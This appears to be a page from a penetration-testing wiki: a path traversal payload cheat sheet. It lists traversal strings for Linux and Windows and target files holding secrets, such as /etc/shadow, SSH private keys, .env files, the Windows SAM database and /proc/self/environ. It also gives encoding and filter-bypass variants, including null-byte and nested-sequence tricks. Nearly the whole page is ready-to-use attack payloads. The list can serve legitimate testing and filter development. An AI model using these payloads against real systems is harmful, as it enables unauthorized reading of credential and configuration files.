Path Traversal

Linux Traversal

../
../../
../../../
../../../../
../../../../../
../../../../../../
../../../../../../../
../../../../../../../../
../../../../../../../../../

Windows Traversal

..\
..\..\
..\..\..\
..\..\..\..\
..\..\..\..\..\
..\/
..\/..\
..\/..\/
..\/../
../\..\

Common Target Files - Linux

System Files

../../../etc/passwd
../../../etc/shadow
../../../etc/group
../../../etc/hosts
../../../etc/hostname
../../../etc/issue
../../../etc/motd
../../../etc/mysql/my.cnf
../../../etc/ssh/sshd_config
../../../etc/apache2/apache2.conf
../../../etc/nginx/nginx.conf

Application Configuration

../../../var/www/html/config.php
../../../var/www/html/.env
../../../home/user/.ssh/id_rsa
../../../home/user/.ssh/authorized_keys
../../../home/user/.bash_history
../../../home/user/.bashrc
../../../root/.ssh/id_rsa

Log Files

../../../var/log/apache2/access.log
../../../var/log/apache2/error.log
../../../var/log/nginx/access.log
../../../var/log/nginx/error.log
../../../var/log/auth.log
../../../var/log/syslog
../../../var/log/messages
../../../var/log/secure
../../../var/log/mail.log

Proc Filesystem

../../../proc/self/environ
../../../proc/self/cmdline
../../../proc/self/status
../../../proc/self/fd/0
../../../proc/self/fd/1
../../../proc/version
../../../proc/cpuinfo
../../../proc/net/arp
../../../proc/net/tcp

Common Target Files - Windows

System Files

..\..\..\windows\system32\config\sam
..\..\..\windows\system32\config\system
..\..\..\windows\system32\drivers\etc\hosts
..\..\..\windows\win.ini
..\..\..\winnt\win.ini
..\..\..\boot.ini
..\..\..\windows\system.ini

Application Files

..\..\..\inetpub\wwwroot\web.config
..\..\..\xampp\apache\conf\httpd.conf
..\..\..\Program Files\Apache Group\Apache\conf\httpd.conf
..\..\..\xampp\mysql\bin\my.ini

Encoding Techniques

URL Encoding

..%2f
..%2f..%2f
..%2f..%2f..%2f
%2e%2e%2f
%2e%2e%2f%2e%2e%2f
%2e%2e%5c

Double URL Encoding

..%252f
%252e%252e%252f
%252e%252e%255c

UTF-8 Encoding

..%c0%af
..%c1%9c
%c0%ae%c0%ae/
%c0%ae%c0%ae%c0%af

16-bit Unicode Encoding

..%u2216
%u2216%u2216
..%u2215
%uff0e%uff0e%u2215

Bypassing Filters

Null Byte Injection (Older PHP versions < 5.3.4)

../../../etc/passwd%00
../../../etc/passwd%00.jpg
../../../etc/passwd\x00

Adding Allowed Extension

../../../etc/passwd.jpg
../../../etc/passwd.png
../../../etc/passwd.pdf
../../../etc/passwd.txt

Double Encoding

....//
....\/
..../\

Nested Traversal Sequences

....//....//....//
..;/..;/..;/
....\\....\\....\\

Case Variation (Windows)

..\
..\/
.../
....\

If the application removes ../ from input:

..././
...\.\
....//
.../.../
.....//....//

PreviousVulnerabilities NextLFI

Last updated 8 days ago